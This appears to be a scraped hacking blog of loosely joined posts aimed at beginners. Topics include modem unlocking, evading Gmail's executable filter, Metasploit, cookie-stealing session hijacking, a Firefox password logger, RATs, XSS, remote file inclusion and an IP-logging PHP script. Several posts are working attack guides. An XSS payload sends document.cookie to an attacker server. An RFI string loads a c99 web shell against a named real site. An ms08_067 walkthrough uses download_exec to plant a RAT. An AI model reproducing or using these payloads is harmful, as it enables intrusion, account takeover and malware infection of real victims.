How to unlock Idea netsetter E-1550

Idea NetSetter is a 3G HSDPA USB Device with the model number as Huawei E1550. The device has the maximum speed of 3.6 Mbps which means 330 KB/Sec of download speed.

Here i post for how to unlock Idea netsettar E-1550.

here are step by step tutorial on unlocking idea netsetter.

Here is the Step by step Solution:



First Download Following Softwere which gone we use:

1. modem firmware and Install it (Download from here ).
2. Mobile Partner’s 11.302.09.01.539 Voice USSD and install it > Click here to download.
3.download Video MMS Dashboard. Click here to Download it.
4.E-1550 Netsetter Unlock-er.Click here to Download it From Here.

Now follow the following Step:

1.Run the setup file which is downloaded in 1st step.
> i accept it and click next.
>then it will serch ur device.
>then it diplay the update setting.
>click next it show warnning.
>then it will ask u to input password
u have to Enter the Flash code which will we now generate in next step.
2. open unloacker dowloaded 4th and Put Ur IMEI number in it
>click unlock and it will generate Flash Code
>put Flash code into 1st step.
3.after putting flash code in 1st step click next.
>Update succefully.

4. Now, you are one step closer to unlocking of the NetSetter device. Start the setup file of HUAWEI_UTPS11.302.09.06.209 software and follow the steps. Again, ensure that the 3G device is not being used by any other software so that the application could find it easily.
>process as above step and it would download softwere in ur device.

5. This step involves installing the Huawei Original Unbranded Mobile Partner software on your computer to manage the 3G device. It is the same software that comes with NetSetter but it is just that it is unbranded and has no logo for any telecom company. But it is recommended to install to complete the unlocking procedure. It is like a normal software installation and does not require any specific guidelines.

Then put flash code on Flash code box and You are done with resetting your Idea netsetter modem E1550 SUCCESSFULLY!!!

NOW You can use the device for making voice calls right from your computer using the computer’s mic and speakers.

Enjoy with new Firmware in ur Device. any problem ask in comment-box,

thanx to my buddy ::H4(K3R4U

by::hemal modi

Read More

How To Send .EXE Files From Gmail

We all know that Gmail don't allow to send executable files.
When user will try to send it, everything will work ok until sending it, but when user will click on send button it will display message as "hello.exe is an executable file. For security reasons, Gmail does not allow you to send this type of file." So that means user can't send .exe files.


I am sharing one trick by which user can easily send any type of attachment through gmail. Follow these steps:


Select file which you wanna to send. Suppose I selected hello.exe

• -->>Now Go to Folder Option( Type control in run, then look for folder option).Go to view tab.

• -->>Uncheck, hide extensions for unknown file types. Apply & then Ok.

• -->>Now rename the file hack.exe with hack.ex or any other extension name u want to add..

• -->To receiver inform about changing extension & ask them to renamed it with .exe extension.

That's all.


We can also send it via winrar or winzip, but some time Gmail scans internally in these files too.so the above mentioned way is the good choice...

update...screen shot attached..






by --hemal modi

Read More

Basic Introduction to Metasploit | Hackersbay.in

The Basic ---- Introduction
  
What is Metasploit ?

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

Basically Metasploit is tool which provides complete environment for hacking.

Read More
___________________________________________________________________________

Using The Features

In this part we will talk about using the Exploits , Payloads , Auxiliary , Nops and Encoders

I think i don't need to explain what are these because it is already discussed in the first part 

Metasploit have


+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops


This may vary in your metasploit according to your version.


The Basic use of metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

Read More  
____________________________________________________________________________


Hacking a Box and Giving Instructions using meterpreter


Welcome to the Metasploit Basics Part 3. In this part i will show you a live example of how to own a PC with some exploit and what to do after the Meterpreter session is opened. In short i will explain you about the Meterpreter.

Meterpreter short form Meta-Interpreter .The Meterpreter is one of the advanced payloads available with the MSF. The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system.The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.in short the meterpreter helps us to overcome the limitations and disadvantages of a individual payload like the adduser payload 

Read More

_____________________________________________________________________________

Note To Readers - If you want to promote your articles or web blogs then i will do it for free even if your blog rank is the lowest in alexa or google.

Contact me at -facebook.com/sauravhacker

Read More

Securing Your Wireless Network | A white paper from Hackersbay

Sorry Guys I was out from many days .. I am back with a new article about Securing Wireless Networks - A white paper from Hackersbay

Here are the few Terminologies, You should know About Wireless networked systems..!! if u don understand this underlyin concepts, it lll be a hard time for u to guarding yo Wireless network..

SSID: (Service Set Identifier) If u having a wireless router or modem the Hardware must have SSID(Like Namin a New born Baby, Yo can name ur Router How it wann be called ba others,But If u take any BSNL Connection Wi fi ASDL Modem Comes With SSID name May be second name of yo father)


Router has a 

Device Burned With MAC &SSID Found in the Picture(WANADOO-02DB)
functionality that it can broadcast or stealth broadcast Which means if u scan for wireless networks u often find networks in Broadcast mode (I.e Tikona 1800 204 3333)Like that…In stealth Broadcast we cant identify the wireless network.. MODEM Don have this fuckin option, so that’s y weneva u scan any, u find some home networks modem range..but u can proceed only after Given SSID in the prompt box..!! 

 WEP: (Wired Equivalence privacy) this Protocol givea Base level security for all wi fi vendors and system Can benefit from OSI Standardization effort..Tha

fat ass option is one can Set in “ON” Or
“OFF”To use this…But Mostly all jerks n Geeks Forcibly set this “ON”

 WPA: (Wi Fi Protected Access) A security protocol tat was designed to secure Wireless Technology and To overcome the WEP Limitations..!! (WPA & WPA2 )

 TKIP: (Temporal Key Intergrity protocol) It’s a More secure version of WEP and it utilize the WPA For Network Security, It uses Some Diff kinda Algorithms than WEP, More trusted Encryption tunnels.(But trust me, most admin will not use this, But the Company Security policy wants to maintain diff security scheme for each heirerachy of the employes in the Org…Admins will deploy this feature)

 

MAC: (Media Access Control) Its used to get Multiple access in a Networked Environment,But MAC Address is a 12Digit Hexa decimal number that is associated with Network adapter, MAC Address is unique to each IP Address…(00-12-FA-WE-3R-TR) First 6 digits Says 00-12-FA Manufacturer Code Which say Network Adapter belongs to Whom, And next 6 digit Was assigned to unique Persons WE-3R-TR.

 DHCP : (Dynamic Host Configuration Protocol)  its one of the inbuilt features of Router..It services for the User who restarts the system, Generates the fresh IP address to them to frame the Device address in the network


Whether you are in Wired or wireless Environment..Yo are under Scan by some1 eye, TCP Monitor Or Any one Can use Sniffer tools like packetyzer to and can read your communication Coz all the transportations are not encrypted..

POSSIBLE ATTACKS: 

EAVESDROPPING (Installing Malicious tools and Make ur machine as a listener, And he hacker gets all packet information coz it was redirected by him to server)

DoS Attacks  Injecting Noise Or Interfrences in the wireless network Infinitely, Cause inturn Denial for particular service which tey Requested,Remember A Hacker Can Extract the SSID name of the network in Response to His ICMP Packets..This gives u a Glimpse of Dos Attacks

WEP Encryption “TURN ON
WEP Encrytion is the standard Encryption scheme for all OSI Network Complicance Products, It comes With Encryption, But doesn’t” TURNED ON” Automatically, Do it And Change all the defaults in the Newly purchased Router..So yo have changed SSID, And Turned On WEP…. I Assume.

 

DUMP THE DEFAULTS  Change all your defaults passwords.And keep this Security checklist With you…! Which also Includes Changing the Default Subnet that is 192.168.1.0 

 

Find the Original White Paper By h4ckfreak at Hackersbay

Read More

How to Hack Email Account with Cookie stealing [For Newbies]

How to hack Email account:

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter hisEmail account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:

1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:

Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hackEmail account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
   1. By assigning specific timestamp(helpful for us).
   2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.
3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing. As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account...

VIa = http://www.go4expert.com

Read More

Firefox a inbuilt keylogger

I am sorry if you thought something else while visiting this post :P

Mozilla Firefox can be turned  undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user.

Steps to Turn Your Firefox Into A KeyLogger

• Close Firefox Application if open
• Go to: Windows- C:/Program Files/Mozilla Firefox/Components
• Find The Script Named " nsLoginManagerPrompter.js"
• Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.

From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes

 

This is not a remote keylogger but a good one if your victim uses your computer while managing his accounts ;)

Read More

WEBOPEDIA - The experts choice

Hacking and Security both the words are related to one thing THE COMPUTER.. Now the computer also have its own living style..

Some Words are there in the world of Computers which are difficult to understand... like SSID , OEM ,WI-FI , OSI , CPU , etc etc

It becomes damn difficult to know the meanings when you dont have a dictionary ( oxford doesn't gives meanings )

So Now I have a very good dictionary for you guys :)

WeBOpeDia The HacKerS ChoIce

Go here and see it yourself :)

do reply here

Read More

BodgeIt Strore the vulnerable web application for penetration testers

Various applications such as vulnerable web applications such as Jarlsberg, WackoPicko, Damn Vulnerable Web Application (DVWA), Vicnum, etc. Now we have another application that is vulnerable and ready to be exploited! The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to penetration testing.

Features

• Easy to install – just requires java and a servlet engine, e.g. Tomcat
• Self contained (no additional dependencies other than to 2 in the above line)
• Easy to change on the fly – all the functionality is implemented in JSPs, so no IDE required
• Cross platform
• Open source
• No separate db to install and configure – it uses an ‘in memory’ db that is automatically (re)initialized on start up

Install
 you need to do is download and open the zip file, and then extract the rar file into the webapps directory of your favorite servlet engine.

You may use http://www.apachefriends.org/en/xampp-windows.html#522 for this

DOWNLOAD bodgeit.1.1.0.zip

Thank You 

Read More

Making a PHP RAT | VB.NET

What is a RAT ?


The RAT connects using standard TCP/IP protocol, as long as the server file is loaded on the target victim computer. Once this file has been loaded once, the operator of the client end of the tool can then modify the registry to cause this file to be started everytime Windows starts, ensuring the hacker will always have access to the infected system.

Once access has been established, the hacker has almost complete control over his target. Every file on the system can be renamed, moved, deleted, frozen, changed, replaced, anything you can imagine. WAV files can be played, or played on loop, to annoy the hell out of the receiving end. Video and still images can be captured to have a log of the computer's visual activity.

In addition to this, the tool allows the hacker to share additional drives over the network, such as floppy or CD drives, allowing the hacker to write files to floppies or open/close the CD-ROM drive.

A more serious tool in the hacker's possession is the ability to log all keystrokes on the infected machine, allowing him to acquire passwords from the system. In addition, it can also acquire cached passwords, such as Windows Logon passwords, making the system incredibly vulnerable to attack and vandalism.

Finally, if the hacker is persistent enough, he can prevent the user from removing the tool from a variety of ways, short of disabling the network. Shutting down, locking, and restarting the computer are all options to stop the victim from removing the trojan, unless the network connection is broken.

Watch the VIDEO 

 note- PHP RAT DOESN'T NEED PORT FORWARDING 

Credits to - The original makers of this video

Happy Hacking

Read More

Change Proxy | Change Your Proxy Using Firefox

♥ I love Proxies ♥

What Are Proxies ?

In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol.go here for learning more

Now Up to the Topic  (Changing your proxy)

We change it for - anonymity  purposes
Requirements 
i)A browser - (In my case i am gonna use Firefox)
ii)Fresh Proxies (Not Dead or Outdated Ones)


For Proxy I am Going To Use - Hidemyass's Proxy Lists 

There we can get very fast and updated servers That is why i ♥ it :D


S     T    E    P    S

I am now going to use a fast German proxy for this tutorial

Then go to Tools>Options>Advance>Network tab>Settings

 Click on OK you are done then :D


Notes-

• this proxy was a example proxy using this which i used may cause malfunctions in your connection
• Always Do with a FRESH PROXY 
• Do select a proxy with good speed and connection time (I suggest using US/UK proxies)
• After finishing your work again follow the above steps and click on Auto-Detect proxy setting for this network. 

Hope You enjoyed this small tutorial


Happy Hacking

Read More

Mozilla Firefox - The hacker's choice

The security testers or the hackers have a lot of tool to play around with . But what if Your browser helps you in this ?

The magical browser is Mozilla Firefox and the extensions/add-ons developed by the professional ethical hackers and penetration testers..

In this article i will tell you some of the best add-ons of all time that hacker  uses....

Download Firefox from Google

Now back to topic

Social engineering add-on

People Search and Public Record: This Firefox extension is a very handy tool for investigators,hackers,legal professionals, and anyone interested in doing their own basic people searches and public record look ups as well as background research.

Google and Spider

Advanced dork : Gives quick access to Google’s Advanced Dorks directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously.

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack

Editors (WEBMASTER)

JSView : The ’view page source’ menu item now opens files based on the behavior you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor..

Firebug : Firebug integrates with Firefox to put a wealth of development tools at your hand while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page

XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.


Headers manipulation and agent switcher

HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl : Control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser

Cookies manipulation/editors 

Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.

httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side
 Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file

Security Tools

HackBar : This toolbar will help  in testing sql injections, XSS holes and site security.This tool will not help you to exploit the vulnerability or to learn hacking. Its main purpose is to help a hacker do security audits on his code.

Tamper Data : tamper data to view and modify HTTP/HTTPS headers and post parameters.

Chickenfoot: Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing

Proxy utilities

POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side Javascriptto run a server inside your browser. Use it to distribute files from your browser. It supports Server-side JS, GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.

FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s proxy configuration. It offers more features than SwitchProxy, Proxy Button etc

SwitchProxy: SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes

miscellaneous 

Hacks for fun 

Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript.scripts could be download at user scripts

Read More

A Complete Tutorial On XSS (cross site scripting)

Welcome To another lesson in which i will be covering XSS..

Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

3-In the Third one  you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also  inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most  places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!

Finding XSS Vulnerabilities
Well to start finding these vulnerabilities you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's and many things

Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
inurl:"search.php?q=" now that is a common page and has a lot of results, Now lets move on to the next part

The Basics On XSS


To know the basic this Picture may help you 

The most used Xss injection is 

<script>alert("XSS")</script>

This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject 

<script>alert("your name or message")</script>

So going previous i told you a google dork , search.php?q= 
Well we will use this to check for vulnerabilities

To check if it is vulnerable we type

www.site.com/search.php?q=<script>alert("your name or message")</script>


This then gives a popup like this

 Many at times this works but if it does not work don't cry we have another way.. :P

 You can try injecting HTMl ;)

You can put this two strings to inject html

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our url will be

www.site.com/search.php?q= <h1>anything you want</h1>
or 
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text on the page and newlines then you knows its vuln

Example






















Deface Methods 
Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,
 

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.


ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Now a popup or a redirection

<script>window.open( "http://hacking-class.blogspot.com" )</script>

 Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here 

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Now it is the time to hijack the cookies

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

 Filteration Bypassing


Alot of sites may seem vulnerable but not executing the code..This will help you

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Hope that helped you


Happy Hacking

Read More

Hacking Website Using Remote File Inclusion

Welcome back to hacking-class.In this article I will tell about Remote file inclusion It is basically  one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it..

1-Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a url similar to the below one

www.Targetsite.com/index.php?page=Anything

The Google Dork is

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker normaly use the following command

www.targetsite.com/index.php?page=www.google.com

But as I am Posting this here so the links must be hatke :P

I found this site it is very good to give you example

http://www.cbspk.com

Now we wanna check if it is vulnerable .. we type

http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.comhttp://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com

Now This appears 

A website opens in another website this means this website is vulnerable to RFI.

You can also type

http://www.cbspk.com/v2/index.php?page=http://www.google.com

and u will get some similar results.

Ok now Moving On to the next part...


Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.

http://h1.ripway.com/saurav1234/c99shell.php?

Now here how the hacker will execute the command  on the website

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?

Now whoila We have executed the shell

 Now I will not tell how to run your scripts using the shell try finding out your self.

NOte- Remember to add “?” at the end of url or else the shell will not execute..

This is for educational purposes only using this knowledge in a illegal way  is strictly prohibited.

Read More

Infecting Ip using Metasploit

Using this Tutorial You can put your RAT,STEALER,KEYLOGGER or DDOSER using IP and this tutorial.

THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!!

WE NEED:

1. Nmap
2. Metasploit 

1. First we need to find victms IP. 

You can Follow my TUTORIAL which i posted earlier

2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...

3. Now we scan victms IP
So in metasploit type 'Nmap'

Next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...

If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit

In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)

Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'

Than type 'Show options'
You will se enough of options, fill only RHOST i URL.

Type: set RHOST <target IP>

Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stiler, virus what is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'

Note-before Doing this have a look at my previous post Here

Read More

Bypass/Hack Adf.ly - Url shortener service

we all know, there are tons of ways for making money online like Adf.ly. Adf.ly pays bucks for each advertisement seen using your shortened link. The link viewer has to wait for 5 seconds until the advertisement loads and only after 5 seconds, he can view the actual  page.

By Doing The Thing I gave You below will help you to bypass Adf.ly advertisement. By using this Adf.ly hack, you don't need to wait for counter to go to zero.

To bypass/hack Adf.ly, you need to have Firefox browser with Greasemonkey installed. You can install Greasemonkey firefox addon, if you haven't installed yet.

1. Go to Adf.ly Hacker script page to bypass/hack Adf.ly advertisements.

2. Hit on Install and confirm the script installation in your Greasemonkey.

3. Now, whenever you'll click on any Adf.ly shortened link, you won't see any timer or counter of 5 seconds. The actual  page will appear.

Hope You Guyz like it

HAPPY HACKING

Read More

IP Catcher-Steal Ip's

Many People are very curious to know the ip of the friend we are chatting using Google talk though they don't know how to use it in a good or a bad way. I will In this article teach you how to steal ip using a PHP script

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

How to steal a Ip adress?? 

Register a Free hosting at byethost and follow the steps.

<html>
<?php
$file = "ips.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n");
fclose($f);
?>
<p>Nothing Found!!saurav!!</p>
</body>
</html>

 Save it as steal.php

1.) First of all you need to make a new .txt document on the website you're uploading this to. Name it ips.txt (You can change that in the script aswell where it says $file = 'ips.txt'; in the second line)(which i have done already) . Then change the CHMOD to 777.

2.) Now you need to past the script above in to a steal.php document, and upload it. 

3.) Now you make people visit your site, and they will see only " Nothing Found!!saurav!! " !

4.) To view the IP, you simply add "/ips.txt" after your domain, and you'll see the IP.


This is a very simple, but effectually method for stealing someones IP Address.
Happy Hacking.







 

Read More